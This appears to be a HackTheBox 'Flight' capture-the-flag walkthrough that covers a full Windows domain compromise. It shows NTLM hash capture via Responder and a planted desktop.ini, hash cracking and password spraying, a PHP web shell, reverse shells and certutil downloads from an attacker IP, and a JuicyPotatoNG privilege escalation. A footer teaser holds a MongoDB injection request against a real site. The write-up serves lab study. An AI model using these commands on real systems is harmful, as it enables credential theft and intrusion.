# [HackTheBox] Flight ![](https://i.imgur.com/vXpBdHO.png) ## Foothold Checking ports is open in this target ```bash #$ nmap -p- --min-rate 1000 10.10.11.187 Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-13 01:46 EST Nmap scan report for school.flight.htb (10.10.11.187) Host is up (0.30s latency). Not shown: 65516 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 9389/tcp open adws 49667/tcp open unknown 49673/tcp open unknown 49674/tcp open unknown 49697/tcp open unknown 49709/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 197.92 seconds ``` Checking the Subdomains and Subfolders: ```bash wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://flight.htb/ Total requests: 19966 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000624: 200 90 L 412 W 3996 Ch "school" ``` After get the subdomain is `School`, we continue to enum the URL. ```bash dirsearch -u http://school.flight.htb _|. _ _ _ _ _ _|_ v0.4.3.post1 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 Wordlist size: 11460 Output File: /home/kayiz/Desktop/HTB/Flights/reports/http_school.flight.htb/_22-12-13_01-56-16.txt Target: http://school.flight.htb/ ``` But i notice this envidence: ![](https://i.imgur.com/xkfcrqB.png) It's maybe LFI vulnerability in this URL so we check it with `../../../../etc/passwd` and got the result. ![](https://i.imgur.com/970WrHI.png) So we will check the sourcecode to make sure how the filter work right ```bash <?php ini_set('display_errors', 0); error_reporting(E_ERROR | E_WARNING | E_PARSE); if(isset($_GET['view'])){ $file=$_GET['view']; if ((strpos(urldecode($_GET['view']),'..')!==false)|| (strpos(urldecode(strtolower($_GET['view'])),'filter')!==false)|| (strpos(urldecode($_GET['view']),'\\')!==false)|| (strpos(urldecode($_GET['view']),'htaccess')!==false)|| (strpos(urldecode($_GET['view']),'.shtml')!==false) ){ echo "<h1>Suspicious Activity Blocked!"; echo "<h3>Incident will be reported</h3>\r\n"; }else{ echo file_get_contents($_GET['view']); } }else{ echo file_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html"); } ?> ``` Humh it's maybe so hard to try to bypass this filter for exploiting this vul. => The url validation part prevents us from doing LFI. But we can use this code to force the service to fetch a remote source using Windows network share syntax: //ip>/<share> and attempt to capture the hash of a service. ```bash #Website: http://school.flight.htb/index.php?view=//ip-attack/test #Attacker's machine: responder -I tun0 -wPv __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR & MDNS Responder 3.1.3.0 To support this project: Patreon -> https://www.patreon.com/PythonResponder Paypal -> https://paypal.me/PythonResponder Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C [+] Poisoners: LLMNR [ON] NBT-NS [ON] MDNS [ON] DNS [ON] DHCP [OFF] [+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [ON] Auth proxy [ON] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] [+] HTTP Options: Always serving EXE [OFF] Serving EXE [OFF] Serving HTML [OFF] Upstream Proxy [OFF] [+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Force ESS downgrade [OFF] [+] Generic Options: Responder NIC [tun0] Responder IP [10.10.16.13] Responder IPv6 [dead:beef:4::100b] Challenge set [random] Don't Respond To Names ['ISATAP'] [+] Current Session Variables: Responder Machine Name [WIN-UJ4VMU7XFG1] Responder Domain Name [R924.LOCAL] Responder DCE-RPC Port [47241] [+] Listening for events... [SMB] NTLMv2-SSP Client : 10.10.11.187 [SMB] NTLMv2-SSP Username : flight\svc_apache [SMB] NTLMv2-SSP Hash : svc_apache::flight:90b54e5073440f91:DACEA051848BC07064B8F1F6CF6ECAFD:0101000000000000003EECF9970ED90152190EB7403C9CC30000000002000800520039003200340001001E00570049004E002D0055004A00340056004D0055003700580046004700310004003400570049004E002D0055004A00340056004D005500370058004600470031002E0052003900320034002E004C004F00430041004C000300140052003900320034002E004C004F00430041004C000500140052003900320034002E004C004F00430041004C0007000800003EECF9970ED90106000400020000000800300030000000000000000000000000300000E07D4392A4BC40C85784D45E08300CFC51A6ED1E43328109EE9B0274E51796EC0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00310033000000000000000000 ``` Crack this hash with hashcat and get the result: ```bash hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt --show SVC_APACHE::flight:8c0eafbdd12e31fd:e3a4c51868aef317982aabb15ce83935:010100000000000080c8475ed80dd901b5e12e7f671312270000000002000800590048003900320001001e00570049004e002d0030005200590058005800350031005800460041004b0004003400570049004e002d0030005200590058005800350031005800460041004b002e0059004800390032002e004c004f00430041004c000300140059004800390032002e004c004f00430041004c000500140059004800390032002e004c004f00430041004c000700080080c8475ed80dd901060004000200000008003000300000000000000000000000003000008e8c740a436ff819b2c69c06aef972668429b6fd779ee4577bff175870156ea60a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310033000000000000000000 :S*******13 ``` ## Enum the SMB services: After get the creds `svc_apache`, we will check the folders in SMB service ```bash smbclient -L //flight.htb/ -U svc_apache Password for [WORKGROUP\svc_apache]: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Shared Disk SYSVOL Disk Logon server share Users Disk Web Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to flight.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` ## AD Enum: Perform enum on SMB using the previously obtained credential ```bash > ~/tools/cme/cme OR crackmapexec smb flight.htb -u svc_apache -p 'S*********3' --users SMB flight.htb 445 G0 flight.htb\O.Possum badpwdcount: 0 desc: Helpdesk SMB flight.htb 445 G0 flight.htb\svc_apache badpwdcount: 0 desc: Service Apache web SMB flight.htb 445 G0 flight.htb\V.Stevens badpwdcount: 0 desc: Secretary SMB flight.htb 445 G0 flight.htb\D.Truff badpwdcount: 0 desc: Project Manager SMB flight.htb 445 G0 flight.htb\I.Francis badpwdcount: 0 desc: Nobody knows why he's here SMB flight.htb 445 G0 flight.htb\W.Walker badpwdcount: 0 desc: Payroll officer SMB flight.htb 445 G0 flight.htb\C.Bum badpwdcount: 1 desc: Senior Web Developer SMB flight.htb 445 G0 flight.htb\M.Gold badpwdcount: 0 desc: Sysadmin SMB flight.htb 445 G0 flight.htb\L.Kein badpwdcount: 0 desc: Penetration tester SMB flight.htb 445 G0 flight.htb\G.Lors badpwdcount: 0 desc: Sales manager SMB flight.htb 445 G0 flight.htb\R.Cold badpwdcount: 0 desc: HR Assistant SMB flight.htb 445 G0 flight.htb\S.Moon badpwdcount: 0 desc: Junion Web Developer ``` Using a similar approach, we learnt that another user `s.moon` is using the same password as `svc_apache` ```bash > ~/tools/cme/cme OR crackmapexec smb flight.htb -u users.txt -p 'S*********3' --continue-on-success SMB flight.htb 445 G0 [-] flight.htb\O.Possum:S*********3 STATUS_LOGON_FAILURE SMB flight.htb 445 G0 [+] flight.htb\svc_apache:S*********3 SMB flight.htb 445 G0 [-] flight.htb\V.Stevens:S*********3 STATUS_LOGON_FAILURE SMB flight.htb 445 G0 [-] flight.htb\D.Truff:S*********3 STATUS_LOGON_FAILURE SMB flight.htb 445 G0 [-] flight.htb\I.Francis:S*********3 STATUS_LOGON_FAILURE SMB flight.htb 445 G0 [-] flight.htb\W.Walker:S*********3 STATUS_LOGON_FAILURE SMB flight.htb 445 G0 [-] flight.htb\C.Bum:S*********3 STATUS_LOGON_FAILURE SMB flight.htb 445 G0 [-] flight.htb\M.Gold:S*********3 STATUS_LOGON_FAILURE SMB flight.htb 445 G0 [-] flight.htb\L.Kein:S*********3 STATUS_LOGON_FAILURE SMB flight.htb 445 G0 [-] flight.htb\G.Lors:S*********3 STATUS_LOGON_FAILURE SMB flight.htb 445 G0 [-] flight.htb\R.Cold:S*********3 STATUS_LOGON_FAILURE SMB flight.htb 445 G0 [+] flight.htb\S.Moon:S*********3 ``` ## User: C.bum Using impacket-smbexec, we can find out which share is writable. But there seems to be customised code that prevents a lot of file types to be written: `Shared` ```bash impacket-psexec flight.htb/s.moon@g0.flight.htb Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation Password: [*] Requesting shares on g0.flight.htb..... [-] share 'ADMIN$' is not writable. [-] share 'C$' is not writable. [-] share 'NETLOGON' is not writable. [*] Found writable share Shared [*] Uploading file uCHgwuyI.exe [-] Error uploading file uCHgwuyI.exe, aborting..... [-] Error performing the installation, cleaning up: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) ``` I realize the `Shared` folder can upload and modify item => So i refer this post https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini ```bash [.ShellClassInfo] IconResource=\\<ip>\test ``` After creating the file `desktop.ini`, we put it in the smb folder `Shared`: ```bash smbclient //flight.htb/shared -U S.moon Password for [WORKGROUP\S.moon]: Try "help" to get a list of possible commands. smb: \> put desktop.ini With Attacker's machine: responder -I tun0 -wPv __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR & MDNS Responder 3.1.3.0 To support this project: Patreon -> https://www.patreon.com/PythonResponder Paypal -> https://paypal.me/PythonResponder Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C [+] Poisoners: LLMNR [ON] NBT-NS [ON] MDNS [ON] DNS [ON] DHCP [OFF] [+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [ON] Auth proxy [ON] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] [+] HTTP Options: Always serving EXE [OFF] Serving EXE [OFF] Serving HTML [OFF] Upstream Proxy [OFF] [+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Force ESS downgrade [OFF] [+] Generic Options: Responder NIC [tun0] Responder IP [10.10.16.13] Responder IPv6 [dead:beef:4::100b] Challenge set [random] Don't Respond To Names ['ISATAP'] [+] Current Session Variables: Responder Machine Name [WIN-W7Y6MWYR8I8] Responder Domain Name [K8PD.LOCAL] Responder DCE-RPC Port [46715] [+] Listening for events... [SMB] NTLMv2-SSP Client : 10.10.11.187 [SMB] NTLMv2-SSP Username : flight.htb\c.bum [SMB] NTLMv2-SSP Hash : c.bum::flight.htb:c69dd0be9d4ce77f:00496C1DA43547AFEB8ED388C9C0DA2D:010100000000000000C6E5869D0ED901BE5A960CC06FDB0D00000000020008004B0038005000440001001E00570049004E002D0057003700590036004D0057005900520038004900380004003400570049004E002D0057003700590036004D005700590052003800490038002E004B003800500044002E004C004F00430041004C00030014004B003800500044002E004C004F00430041004C00050014004B003800500044002E004C004F00430041004C000700080000C6E5869D0ED90106000400020000000800300030000000000000000000000000300000E07D4392A4BC40C85784D45E08300CFC51A6ED1E43328109EE9B0274E51796EC0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00310033000000000000000000 ``` After that we use hashcat to crack c.bum password: ```bash hashcat -a 0 -m 5600 hash_c.bum /usr/share/wordlists/rockyou.txt --show C.BUM::flight.htb:63feab9f7229564f:2bc7d47b69023462e28e2df7dccce6e6:010100000000000080375566db0dd9010a4e5110dfd2119000000000020008004e0042004200380001001e00570049004e002d0042005400540039004a0050005a004a0042003700550004003400570049004e002d0042005400540039004a0050005a004a004200370055002e004e004200420038002e004c004f00430041004c00030014004e004200420038002e004c004f00430041004c00050014004e004200420038002e004c004f00430041004c000700080080375566db0dd901060004000200000008003000300000000000000000000000003000008e8c740a436ff819b2c69c06aef972668429b6fd779ee4577bff175870156ea60a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310033000000000000000000 :T*************4 ``` After get this cred, we can login into the `Web` folder with smb service. ```bash smbclient //flight.htb/Web -U c.bum Password for [WORKGROUP\c.bum]: Try "help" to get a list of possible commands. ``` Then i put the p0wny-shell into the `flight.htb`: https://github.com/flozz/p0wny-shell ```bash smb: \> ls . D 0 Tue Dec 13 09:57:01 2022 .. D 0 Tue Dec 13 09:57:01 2022 flight.htb D 0 Tue Dec 13 09:57:01 2022 school.flight.htb D 0 Tue Dec 13 09:57:01 2022 5056511 blocks of size 4096. 1250756 blocks available smb: \> cd flight.htb smb: \flight.htb\> put web_shell.php test.php putting file web_shell.php as \flight.htb\test.php (8.4 kb/s) (average 9.0 kb/s) smb: \flight.htb\> ``` Then go to the web_shell and get the connect session with revshells.com ![](https://i.imgur.com/zUBnbtC.png) ## C.bum Session: We got the cred of c.bum so we need to change the session connect to c.bum with `RunasCS` : https://github.com/antonioCoco/RunasCs/tree/master ```bash PS C:\Users\svc_apache\Desktop> .\test.exe c.bum Tikkycoll_431012284 powershell -r 10.10.16.13:9003 [*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)... [+] Running in session 0 with process function CreateProcessWithLogonW() [+] Using Station\Desktop: Service-0x0-59b6e$\Default [+] Async process 'powershell' with pid 2380 created and left in background. ``` After that we can type the `user.txt` file ## P.E After get the shell with `svc_apache` user, i will check port which is opening to serve the specified service and i got the `8000`. So i pivot it with chisel to interact to it with attacker's machine: ```bash PS C:\xampp\htdocs\flight.htb> netstat -a Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:80 g0:0 LISTENING TCP 0.0.0.0:88 g0:0 LISTENING TCP 0.0.0.0:135 g0:0 LISTENING TCP 0.0.0.0:389 g0:0 LISTENING TCP 0.0.0.0:443 g0:0 LISTENING TCP 0.0.0.0:445 g0:0 LISTENING TCP 0.0.0.0:464 g0:0 LISTENING TCP 0.0.0.0:593 g0:0 LISTENING TCP 0.0.0.0:636 g0:0 LISTENING TCP 0.0.0.0:3268 g0:0 LISTENING TCP 0.0.0.0:3269 g0:0 LISTENING TCP 0.0.0.0:5985 g0:0 LISTENING TCP 0.0.0.0:8000 g0:0 LISTENING ``` Pivoting Network with Chisel: ```bash #Client: .\chisel.exe client 10.10.16.13:9999 R:8000:127.0.0.1:8000 #Server: chisel server --reverse -p 9999 ``` After i got the connect with website, i realize the website is written by ASP .NET => i can try to upload the `.aspx` shell to reverse this sesssion ```bash Because the shell maybe remove very quick so we need to upload it to somewhere and we just copy it maybe it's necessary. PS C:\users\svc_apache\Desktop> copy cmd.aspx c:\inetpub\development\ ``` We can get the reverse shell with `iis apppool\defaultapppool` ![](https://i.imgur.com/KLasfgL.png) ## Administrator Enum: ```bash PS C:\windows\system32\inetsrv> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeMachineAccountPrivilege Add workstations to domain Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled ``` After refering this post https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens. I decide to choose Potatojuice to Priv this machine https://github.com/antonioCoco/JuicyPotatoNG ```bash i will upload 2 things into c:\users\c.bum\desktop >certutil.exe -urlcache -f http://10.10.16.13/nc.exe nc.exe >certutil.exe -urlcache -f http://10.10.16.13/JuicyPotatoNG.exe test.exe After that we grant permission 2 files for everyone >icacls nc.exe /grant Users:F >icacls test.exe /grant Users:F ``` We go to the `iis/appool` session to get the root ```bash c:\users\c.bum\desktop\test.exe -t * -p "c:\users\c.bum\desktop\nc.exe" -a "10.10.16.13 9005 -e cmd.exe" ``` Result: ![](https://i.imgur.com/J5ErEZ6.png)
Last changed by  
Kayiz-PT
11668

Read more

Vulnerability Report (uu.nl)

Exploit Author Nguyen Hoang Quoc An (HTCG) Vulnerability Type: MongoDB Injection URL: https://cemrol.hum.uu.nl/ POC Request: Extract data belong to "root" GET /subjects?limit=3&min_subject_order=0&page=2&status=active&subject_set_id=5dcc29d3db8a2c9748a94352&type[%24eq]=root&workflow_id=5c1129a7db8a2c17a2366009 HTTP/1.1 Host: cemrol.hum.uu.nl

12/19/2022
Read more from Kayiz-PT
Published on HackMD